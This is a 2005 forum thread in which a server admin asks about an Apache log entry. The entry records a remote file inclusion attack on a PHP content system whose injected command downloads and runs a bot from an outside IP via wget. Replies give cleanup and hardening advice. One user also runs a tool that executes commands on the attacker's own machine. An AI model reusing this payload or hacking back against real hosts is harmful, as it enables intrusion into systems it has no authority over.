access_log compromise ??

lawadm1 · 12-17-2005, 04:20 PM

I saw a similar post yesterday, only one of my entries had a 200 status.

Can anyone tell me what they were able to accomplish, or what I need to look for?

24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://81.174.26.111/cmd.gif?&cmd=
cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

neo77777 · 12-17-2005, 06:53 PM

They are trying to exploit PHP code, and install an IRC bot, disable global variables and turn the safe_mode on in php.ini.

neo77777 · 12-17-2005, 06:59 PM

Also, look through ps and netstat output, if you were compromize the listen process will show up in your ps. Look in /tmp and see if listen binary is there. Remeber, if your webserver is running by root, the exploiter owns your system, and could've installed rootkits, etc to hide his presense - the only remedy is to unplug your system from the network, and analyze it, and most probably clean re-install.

lawadm1 · 12-17-2005, 07:36 PM

The webserver is running under the apache id. And the only thing in /tmp is:
keyring-1TvKkp
mapping-root

nic0 · 12-17-2005, 08:01 PM

Code:

nic0@nic0:~$ ./aw 24.70.88.18 * "ps -ef|grep httpd" 3
[*] Output by 24.70.88.18:


root      6698     1  0 Nov18 ?        00:00:14 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   21918  6698  0 Dec15 ?        00:00:03 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   21923  6698  0 Dec15 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   21940  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   28790  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   24770  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   26319  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun    6914  6698  0 Dec16 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   13901  6698  0 12:22 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   24139  6698  0 17:06 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   26687  6698  0 17:17 ?        00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun    7104  7083  0 18:05 ?        00:00:00 sh -c echo SILENTIUM;ps -ef|grep httpd;echo

nic0@nic0:~$

yeah.. he is running apache.

l337 hax0rs should make sure they're computer is secure first.

lawadm1 · 12-17-2005, 08:43 PM

Holy smokes. How do I make sure that can't be done to my machine?

Also, what will disabling global variables and turning safe mode on do?

nic0 · 12-17-2005, 08:59 PM

Disabling global variables disables people from entering their own variables into a request.
General - turning it off increases security a lot.

PHP Safe mode disables a lot of functions that remote users could exploit.

lawadm1 · 12-17-2005, 11:24 PM

So in /etc/php.ini if I have:

register_globals = Off
safe_mode = On

Then this should help a bit?

nic0 · 12-17-2005, 11:40 PM

Yep - this will improve your PHP security a lot. I also recommend getting a security scanner and checking for common vulnerabilities.. Something like Nessus or Amap.